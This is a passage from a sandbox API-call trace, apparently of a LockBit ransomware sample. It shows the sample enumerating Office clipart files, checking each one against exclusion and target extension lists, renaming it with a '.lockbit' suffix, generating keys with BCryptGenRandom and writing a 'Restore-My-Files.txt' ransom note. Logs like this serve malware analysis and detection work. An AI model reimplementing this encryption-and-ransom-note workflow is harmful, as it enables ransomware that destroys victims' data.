lpString2="J0309598.JPG") returned -1 [0157.925] lstrcmpiW (lpString1="autorun.inf", lpString2="J0309598.JPG") returned -1 [0157.925] lstrcmpiW (lpString1="thumbs.db", lpString2="J0309598.JPG") returned 1 [0157.925] lstrcmpiW (lpString1="iconcache.db", lpString2="J0309598.JPG") returned -1 [0157.925] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.925] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG") returned=".JPG" [0157.925] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0157.925] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0157.925] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0157.925] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0157.925] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0157.925] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0157.925] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0157.925] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0157.925] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0157.925] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0157.925] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0157.925] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0157.926] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0157.926] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0157.926] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0157.926] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0157.926] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0157.926] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG.lockbit") returned 72 [0157.926] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309598.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.928] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.928] malloc (_Size=0x40068) returned 0x3df0008 [0157.928] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33264) returned 1 [0157.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.929] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0157.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.936] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.936] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.937] free (_Block=0x1fa2ed8) [0157.937] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.937] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.937] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.937] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xaabb, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0309664.JPG", cAlternateFileName="")) returned 1 [0157.938] lstrcmpiW (lpString1=".", lpString2="J0309664.JPG") returned -1 [0157.938] lstrcmpiW (lpString1="..", lpString2="J0309664.JPG") returned -1 [0157.938] PathFindExtensionW (pszPath="J0309664.JPG") returned=".JPG" [0157.938] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0157.938] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0157.938] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0157.938] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0157.938] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0157.938] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0157.938] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0157.938] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0157.938] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0157.938] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0157.938] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0157.938] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0157.938] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0157.938] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0157.938] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0157.939] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0157.939] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0157.939] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0157.939] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0157.939] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0157.939] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0157.939] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0157.939] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0157.939] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0157.939] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.939] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0157.939] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0157.939] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0157.939] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0157.939] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0157.940] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0157.940] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0157.940] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0157.940] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0157.940] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0157.940] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0157.940] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0157.940] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0157.940] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0157.940] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0157.940] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0157.940] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0157.940] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.940] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0157.940] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0157.941] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0157.941] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0157.941] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0309664.JPG") returned 1 [0157.941] lstrcmpiW (lpString1="ntldr", lpString2="J0309664.JPG") returned 1 [0157.941] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0309664.JPG") returned 1 [0157.941] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0309664.JPG") returned -1 [0157.941] lstrcmpiW (lpString1="autorun.inf", lpString2="J0309664.JPG") returned -1 [0157.941] lstrcmpiW (lpString1="thumbs.db", lpString2="J0309664.JPG") returned 1 [0157.941] lstrcmpiW (lpString1="iconcache.db", lpString2="J0309664.JPG") returned -1 [0157.941] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.941] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG") returned=".JPG" [0157.941] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0157.941] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0157.941] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0157.941] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0157.941] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0157.941] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0157.942] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0157.942] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0157.942] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG.lockbit") returned 72 [0157.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309664.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0157.949] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.949] malloc (_Size=0x40068) returned 0x3d70450 [0157.949] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=43707) returned 1 [0157.949] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0157.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0157.950] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0157.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.953] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.953] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.955] free (_Block=0x1fa2ed8) [0157.955] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.955] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.955] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.955] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66162910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0309705.JPG", cAlternateFileName="")) returned 1 [0157.955] lstrcmpiW (lpString1=".", lpString2="J0309705.JPG") returned -1 [0157.955] lstrcmpiW (lpString1="..", lpString2="J0309705.JPG") returned -1 [0157.955] PathFindExtensionW (pszPath="J0309705.JPG") returned=".JPG" [0157.955] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0157.955] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0157.955] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0157.955] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0157.955] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0157.955] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0157.955] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0157.955] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0157.955] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0157.955] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0157.956] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0157.956] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0157.956] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0157.956] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0157.956] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0157.956] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0157.956] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0157.956] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0157.956] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0157.956] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0157.956] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0157.956] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0157.956] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0157.956] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0157.956] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.956] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0157.957] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0157.957] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0157.957] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0157.957] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0157.957] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0157.957] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.957] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0157.957] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0157.957] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0309705.JPG") returned 1 [0157.957] lstrcmpiW (lpString1="ntldr", lpString2="J0309705.JPG") returned 1 [0157.958] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0309705.JPG") returned 1 [0157.958] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0309705.JPG") returned -1 [0157.958] lstrcmpiW (lpString1="autorun.inf", lpString2="J0309705.JPG") returned -1 [0157.958] lstrcmpiW (lpString1="thumbs.db", lpString2="J0309705.JPG") returned 1 [0157.958] lstrcmpiW (lpString1="iconcache.db", lpString2="J0309705.JPG") returned -1 [0157.958] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.958] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG") returned=".JPG" [0157.958] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0157.958] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0157.958] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0157.958] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0157.958] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0157.958] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0157.958] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0157.958] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0157.958] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0157.959] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0157.959] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0157.959] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0157.959] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0157.959] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0157.959] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0157.959] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0157.959] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0157.959] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG.lockbit") returned 72 [0157.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309705.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0157.960] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.961] malloc (_Size=0x40068) returned 0x1ff1e60 [0157.961] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=19162) returned 1 [0157.961] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0157.961] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.962] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0157.962] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0157.974] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.974] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.974] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.673] free (_Block=0x1fa2ed8) [0158.673] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.673] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.673] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.673] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b95a400, ftCreationTime.dwHighDateTime=0x1bf5cb6, ftLastAccessTime.dwLowDateTime=0x66162910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b95a400, ftLastWriteTime.dwHighDateTime=0x1bf5cb6, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0309902.WMF", cAlternateFileName="")) returned 1 [0158.673] lstrcmpiW 